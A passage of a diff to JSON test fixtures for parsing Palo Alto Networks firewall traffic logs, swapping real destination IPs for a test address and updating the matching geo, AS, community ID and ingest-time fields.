04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25306,1,59281,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -11935,24 +11972,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -11971,7 +12010,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26411,1,55252,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26411,1,55252,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -12005,7 +12044,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:cp0HVI5MHMB+G4/hIuKGoX1WWac=", + "community_id": "1:mWAR74rtLQtQ3iC33h0r+wdk0V4=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -12043,14 +12082,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284336997Z", - "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26411,1,55252,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.382091900Z", + "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26411,1,55252,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -12174,7 +12213,7 @@ }, "event": { "duration": 1000000000, - "ingested": "2021-09-08T12:38:09.284347036Z", + "ingested": "2021-12-09T13:43:22.382096200Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:49,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24844,1,56995,53,0,0,0x200000,udp,allow,176,176,0,2,2012/04/10 04:39:18,1,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,2,0", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", @@ -12198,24 +12237,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -12234,7 +12275,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26335,1,60989,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26335,1,60989,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -12268,7 +12309,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:bIf8k1Z5+8sNSsr63qo8XknzQDo=", + "community_id": "1:8/nD/Ch9ioo4gep5hd7NtL/QOU0=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -12306,14 +12347,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284351865Z", - "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26335,1,60989,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.382100100Z", + "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26335,1,60989,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -12336,27 +12377,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -12375,7 +12415,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26127,1,59280,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26127,1,59280,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -12409,7 +12449,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:IRI0j5xLyLhwaONpy7gVZdl/Qow=", + "community_id": "1:qI6GZCcTdUKaf6uoJvk4RiEYMoc=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -12447,14 +12487,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284356460Z", - "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26127,1,59280,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.382103400Z", + "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26127,1,59280,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -12477,24 +12517,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -12513,7 +12555,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25488,1,53766,53,0,0,0x200000,udp,allow,81,81,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25488,1,53766,53,0,0,0x200000,udp,allow,81,81,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -12547,7 +12589,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:VJaNvIgkNIXRerGHtYQC0HUPZh8=", + "community_id": "1:xc8jYe7XOXr51TL/mrR4hYixL24=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -12585,14 +12627,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284361135Z", - "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25488,1,53766,53,0,0,0x200000,udp,allow,81,81,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.382107500Z", + "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25488,1,53766,53,0,0,0x200000,udp,allow,81,81,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -12615,24 +12657,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -12651,7 +12695,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25269,1,56032,53,0,0,0x200000,udp,allow,81,81,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25269,1,56032,53,0,0,0x200000,udp,allow,81,81,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -12685,7 +12729,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:fMeKYeqX7mnB812D1vOtHs7BRO4=", + "community_id": "1:BbIogVNBViw8uF7WHTsnoLjNl5s=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -12723,14 +12767,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284370026Z", - "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25269,1,56032,53,0,0,0x200000,udp,allow,81,81,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.382113200Z", + "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25269,1,56032,53,0,0,0x200000,udp,allow,81,81,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -12753,24 +12797,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "Europe", - "country_name": "Italy", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Italy", + "region_name": "Jilin", "location": { - "lon": 12.1097, - "lat": 43.1479 - }, - "country_iso_code": "IT" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 3269, + "number": 4837, "organization": { - "name": "Telecom Italia" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 906, - "ip": "62.211.68.12", + "ip": "175.16.199.1", "packets": 7 }, "rule": { @@ -12789,7 +12835,7 @@ }, "packets": 6 }, - "message": "192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25715,1,59193,80,0,0,0x200000,tcp,allow,1487,581,906,13,2012/04/10 04:39:17,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25715,1,59193,80,0,0,0x200000,tcp,allow,1487,581,906,13,2012/04/10 04:39:17,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", "panw": { "panos": { "ruleset": "rule1", @@ -12823,7 +12869,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:2482BoM8NEujTrlI4lp2vfAxmus=", + "community_id": "1:rG/AUdAraCxruLL9/yrSy2a3M3c=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -12861,14 +12907,14 @@ ], "ip": [ "192.168.0.2", - "62.211.68.12", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 1000000000, - "ingested": "2021-09-08T12:38:09.284376014Z", - "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:48,192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25715,1,59193,80,0,0,0x200000,tcp,allow,1487,581,906,13,2012/04/10 04:39:17,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", + "ingested": "2021-12-09T13:43:22.382118600Z", + "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25715,1,59193,80,0,0,0x200000,tcp,allow,1487,581,906,13,2012/04/10 04:39:17,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -12891,27 +12937,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -12930,7 +12975,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26251,1,59279,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26251,1,59279,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -12964,7 +13009,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:FmIwID3HJ4Q0574SjlhMHApz/Hs=", + "community_id": "1:zCXr7ZHueb4XQvihT/RtgRKe8VI=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -13002,14 +13047,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284380602Z", - "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26251,1,59279,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.382123900Z", + "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26251,1,59279,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -13032,27 +13077,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -13071,7 +13115,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25871,1,59278,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25871,1,59278,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -13105,7 +13149,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:WiUImNtgjkeNDi1Qigg7+Y6pDAg=", + "community_id": "1:06OCvk6jDtgpNZu7X72+H8dLeQ8=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -13143,14 +13187,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284385335Z", - "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25871,1,59278,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.382129200Z", + "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25871,1,59278,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -13173,27 +13217,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -13212,7 +13255,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25945,1,59277,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25945,1,59277,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -13246,7 +13289,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:/+Opb16c1ye6uLeu1/TNC+SGnYs=", + "community_id": "1:6PzwuKfF+39cTFyZytdFAhD4w44=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -13284,14 +13327,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284389843Z", - "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25945,1,59277,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.382134600Z", + "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25945,1,59277,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -13415,7 +13458,7 @@ }, "event": { "duration": 1000000000, - "ingested": "2021-09-08T12:38:09.284398842Z", + "ingested": "2021-12-09T13:43:22.382139900Z", "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,end,1,2012/04/10 04:39:47,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25310,1,60026,53,0,0,0x200000,udp,allow,166,166,0,2,2012/04/10 04:39:16,1,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,2,0", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", @@ -13439,27 +13482,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + 